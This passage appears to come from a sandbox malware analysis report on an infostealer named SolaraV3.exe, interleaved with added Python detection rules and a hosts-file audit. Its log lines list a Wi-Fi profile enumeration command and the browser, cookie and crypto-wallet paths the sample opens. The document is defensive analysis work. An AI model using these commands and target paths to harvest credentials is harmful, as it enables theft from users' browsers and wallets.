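    print("hits  :", wallet_hits(carve_marshal_short_ascii(SAMPLE_BLOB)))
```

Substring matching still finds the wallets in the naive output, but the carved names are the ones to use for exact-match rules; a length byte of 0x20 or more (strings of 32+ characters) is itself printable and would also be glued on by the naive extractor, which the carve handles because it reads the length rather than scanning for printable runs.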
Source: C:\Users\user\Desktop\SolaraV3.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "netsh wlan show profile"
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\netsh.exe netsh wlan show profile
Source: C:\Users\user\Desktop\SolaraV3.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "netsh wlan show profile" Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\netsh.exe netsh wlan show profile
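The three behaviours recorded under "Lowering of HIPS / PFW / Operating System Security Settings" (the write to drivers\etc\hosts, the cmd.exe to netsh.exe chain, and the root\SecurityCenter2 AntivirusProduct query) and the netsh wlan show profile lines just above are the observations in this part of the report that a detection engineer would turn into rules. The Python below is an added example, not tooling from the report or the sample: it parses report-style "Source: <image> <action>: <detail>" lines into events, runs three rules over them, and audits a hosts file for active entries. The sample lines and the hosts-file content are constructed for the example and the rule names are my own.

```python
"""Triage helpers for the behaviours listed above.

Added example; not tooling from the report or the sample.  SAMPLE_LINES and
SAMPLE_HOSTS are constructed to look like the report's entries and a stock
Windows hosts file with two added mappings.
"""
import re
from dataclasses import dataclass

# Actions as they appear in the report's "Source: <image> <action>: <detail>" lines.
_ACTIONS = (
    "Process created", "File written", "File opened", "WMI Queries",
    "Queries volume information", "Key value queried",
)
_LINE_RE = re.compile(
    r"^Source:\s+(?P<source>.+?)\s+(?P<action>"
    + "|".join(map(re.escape, _ACTIONS))
    + r"):\s+(?P<detail>.*?)(?:\s+Jump to behavior)?\s*$"
)


@dataclass(frozen=True)
class Event:
    source: str   # image path of the acting process
    action: str   # one of _ACTIONS
    detail: str   # command line, file path or WQL query


def parse_report_line(line):
    """Turn one report line into an Event, or None if it is not an event line."""
    m = _LINE_RE.match(line.strip())
    return Event(m["source"], m["action"], m["detail"]) if m else None


# Detection rules: (rule name, action the rule applies to, pattern over the detail).
RULES = (
    ("hosts_file_tamper", "File written",
     re.compile(r"\\drivers\\etc\\hosts$", re.I)),
    ("wlan_profile_enum", "Process created",
     re.compile(r"\bnetsh(?:\.exe)?\s+wlan\s+show\s+profile", re.I)),
    ("av_product_discovery", "WMI Queries",
     re.compile(r"root\\SecurityCenter2\b.*\bAntivirusProduct\b", re.I)),
)


def match_events(events):
    """Return [(rule_name, acting_process)] for every event a rule matches."""
    hits = []
    for ev in events:
        for name, action, pattern in RULES:
            if ev.action == action and pattern.search(ev.detail):
                hits.append((name, ev.source))
    return hits


# Constructed sample lines shaped like the report's entries (not live telemetry);
# the svchost.exe line is benign noise that no rule should fire on.
SAMPLE_LINES = [
    r"Source: C:\Users\user\Desktop\SolaraV3.exe File written: C:\Windows\System32\drivers\etc\hosts Jump to behavior",
    r'Source: C:\Users\user\Desktop\SolaraV3.exe Process created: C:\Windows\system32\cmd.exe /c "netsh wlan show profile"',
    r"Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\netsh.exe netsh wlan show profile",
    r"Source: C:\Windows\System32\wbem\WMIC.exe WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT displayName FROM AntivirusProduct",
    r"Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation",
]

_HOSTS_ENTRY_RE = re.compile(r"^\s*(?P<ip>[0-9A-Fa-f:.]+)\s+(?P<names>[^#]+)")


def audit_hosts(text):
    """List active (uncommented) hosts-file mappings as (ip, (name, ...)).
    A stock Windows hosts file has every line commented out, so any active
    mapping on a host not known to need one deserves a look, above all ones
    that sinkhole security-vendor or update domains to 0.0.0.0 / 127.0.0.1."""
    entries = []
    for line in text.splitlines():
        m = _HOSTS_ENTRY_RE.match(line)
        if m:
            entries.append((m["ip"], tuple(m["names"].split())))
    return entries


# Constructed hosts-file content: the stock Windows comment header plus two
# active lines of the kind a stealer adds.  The domains are placeholders.
SAMPLE_HOSTS = """# Copyright (c) 1993-2009 Microsoft Corp.
# localhost name resolution is handled within DNS itself.
#    127.0.0.1       localhost
#    ::1             localhost
0.0.0.0 example-av-vendor.invalid
127.0.0.1 update.example.invalid telemetry.example.invalid
"""

if __name__ == "__main__":
    events = [e for e in map(parse_report_line, SAMPLE_LINES) if e]
    for name, proc in match_events(events):
        print(f"{name:22s} <- {proc}")
    for ip, names in audit_hosts(SAMPLE_HOSTS):
        print(f"hosts: {ip} -> {' '.join(names)}")
```

The wlan rule fires on both the cmd.exe wrapper and the netsh.exe child, which is what you want when correlating parent and child; in a live pipeline the same patterns apply to Sysmon event ID 1 command lines, a file-write event on the hosts path, and WMI-activity logging for the SecurityCenter2 query, and the hosts audit is a one-shot check to run on any machine this sample touched.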
Source: C:\Users\user\Desktop\SolaraV3.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default
Source: C:\Users\user\Desktop\SolaraV3.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Cache
Source: C:\Users\user\Desktop\SolaraV3.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Code Cache\js
Source: C:\Users\user\Desktop\SolaraV3.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\DawnCache
Source: C:\Users\user\Desktop\SolaraV3.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\_crx_fmgjjmmmlfnkbppncabfkddbjimcfncm
Source: C:\Users\user\Desktop\SolaraV3.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Feature Engagement Tracker\AvailabilityDB
Source: C:\Users\user\Desktop\SolaraV3.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Code Cache\js\index-dir
Source: C:\Users\user\Desktop\SolaraV3.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications
Source: C:\Users\user\Desktop\SolaraV3.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Code Cache\wasm
Source: C:\Users\user\Desktop\SolaraV3.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings
Source: C:\Users\user\Desktop\SolaraV3.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Temp
Source: C:\Users\user\Desktop\SolaraV3.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Site Characteristics Database
Source: C:\Users\user\Desktop\SolaraV3.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js\index-dir
Source: C:\Users\user\Desktop\SolaraV3.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync App Settings
Source: C:\Users\user\Desktop\SolaraV3.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\_crx_kefjledonklijopmnomlcbpllchaibag
Source: C:\Users\user\Desktop\SolaraV3.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def
Source: C:\Users\user\Desktop\SolaraV3.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Storage\leveldb
Source: C:\Users\user\Desktop\SolaraV3.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Feature Engagement Tracker\EventDB
Source: C:\Users\user\Desktop\SolaraV3.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Segmentation Platform\SignalDB
Source: C:\Users\user\Desktop\SolaraV3.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Download Service
Source: C:\Users\user\Desktop\SolaraV3.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Download Service\EntryDB
Source: C:\Users\user\Desktop\SolaraV3.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\_crx_agimnkijcaahngcdmfeangaknmldooml
Source: C:\Users\user\Desktop\SolaraV3.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Storage
Source: C:\Users\user\Desktop\SolaraV3.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\blob_storage\6f70cc77-7837-4f44-9c31-7de59e446d67
Source: C:\Users\user\Desktop\SolaraV3.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Download Service\Files
Source: C:\Users\user\Desktop\SolaraV3.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\shared_proto_db
Source: C:\Users\user\Desktop\SolaraV3.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Session Storage
Source: C:\Users\user\Desktop\SolaraV3.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache
Source: C:\Users\user\Desktop\SolaraV3.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\PersistentOriginTrials
Source: C:\Users\user\Desktop\SolaraV3.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Local Storage
Source: C:\Users\user\Desktop\SolaraV3.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension Scripts
Source: C:\Users\user\Desktop\SolaraV3.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\WebStorage
Source: C:\Users\user\Desktop\SolaraV3.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda
Source: C:\Users\user\Desktop\SolaraV3.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\cookies.sqlite
Source: C:\Users\user\Desktop\SolaraV3.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache\wasm
Source: C:\Users\user\Desktop\SolaraV3.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Segmentation Platform
Source: C:\Users\user\Desktop\SolaraV3.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Segmentation Platform\SignalStorageConfigDB
Source: C:\Users\user\Desktop\SolaraV3.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\GCM Store\Encryption
Source: C:\Users\user\Desktop\SolaraV3.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\_crx_aghbiahbpaijignceidepookljebhfak
Source: C:\Users\user\Desktop\SolaraV3.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\commerce_subscription_db
Source: C:\Users\user\Desktop\SolaraV3.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\GPUCache
Source: C:\Users\user\Desktop\SolaraV3.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\blob_storage
Source: C:\Users\user\Desktop\SolaraV3.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Code Cache
Source: C:\Users\user\Desktop\SolaraV3.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\favicons.sqlite
Source: C:\Users\user\Desktop\SolaraV3.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\BudgetDatabase
Source: C:\Users\user\Desktop\SolaraV3.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Feature Engagement Tracker
Source: C:\Users\user\Desktop\SolaraV3.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Data\LevelDB
Source: C:\Users\user\Desktop\SolaraV3.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\_crx_mpnpojknpmmopombnjdcgaaiekajbnjb
Source: C:\Users\user\Desktop\SolaraV3.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\databases
Source: C:\Users\user\Desktop\SolaraV3.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\content-prefs.sqlite
Source: C:\Users\user\Desktop\SolaraV3.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sessions
Source: C:\Users\user\Desktop\SolaraV3.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\shared_proto_db\metadata
Source: C:\Users\user\Desktop\SolaraV3.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension State
Source: C:\Users\user\Desktop\SolaraV3.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Network
Source: C:\Users\user\Desktop\SolaraV3.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js
Source: C:\Users\user\Desktop\SolaraV3.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\optimization_guide_model_metadata_store
Source: C:\Users\user\Desktop\SolaraV3.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\GPUCache
Source: C:\Users\user\Desktop\SolaraV3.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Local Storage\leveldb
Source: C:\Users\user\Desktop\SolaraV3.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network
Source: C:\Users\user\Desktop\SolaraV3.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\GCM Store
Source: C:\Users\user\Desktop\SolaraV3.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Session Storage
Source: C:\Users\user\Desktop\SolaraV3.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\optimization_guide_hint_cache_store
Source: C:\Users\user\Desktop\SolaraV3.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage
Source: C:\Users\user\Desktop\SolaraV3.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Code Cache\wasm\index-dir
Source: C:\Users\user\Desktop\SolaraV3.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\DawnCache
Source: C:\Users\user\Desktop\SolaraV3.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\coupon_db Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\AutofillStrikeDatabase Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Data Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache\wasm\index-dir Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension Rules Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Cache\Cache_Data Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Segmentation Platform\SegmentInfoDB Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\_crx_fhihpiojkbmbpdjeoajapmgkhlnakfjf Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cache Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe File opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDB\file_0.indexeddb.leveldb Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe File opened: C:\Users\user\AppData\Roaming\Electrum\wallets Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe File opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe File opened: C:\Users\user\AppData\Roaming\Guarda\Local Storage\leveldb Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\_MEI28842\rar.exe File read: C:\Users\user\AppData\Local\Temp\ ?? ? \Credentials\Chrome\Chrome Cookies.txt
Source: Yara match File source: 00000002.00000002.2038580325.000001FC25070000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: SolaraV3.exe PID: 4892, type: MEMORYSTR

Remote Access Functionality

Source: Yara match File source: 00000002.00000003.1578431253.000001FC253C8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000003.1563577276.000001EA23124000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000002.2038580325.000001FC25070000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000002.2037278592.000001FC22CD0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000003.1577254903.000001FC253A0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000003.1563577276.000001EA23122000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000003.2034413215.000001FC25CB1000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: SolaraV3.exe PID: 2884, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: SolaraV3.exe PID: 4892, type: MEMORYSTR
Source: Yara match File source: C:\Users\user\AppData\Local\Temp\_MEI28842\rarreg.key, type: DROPPED
Source: Yara match File source: Process Memory Space: SolaraV3.exe PID: 4892, type: MEMORYSTR
Source: C:\Users\user\Desktop\SolaraV3.exe Code function: 2_2_00007FFB0B812B62 bind,WSAGetLastError, 2_2_00007FFB0B812B62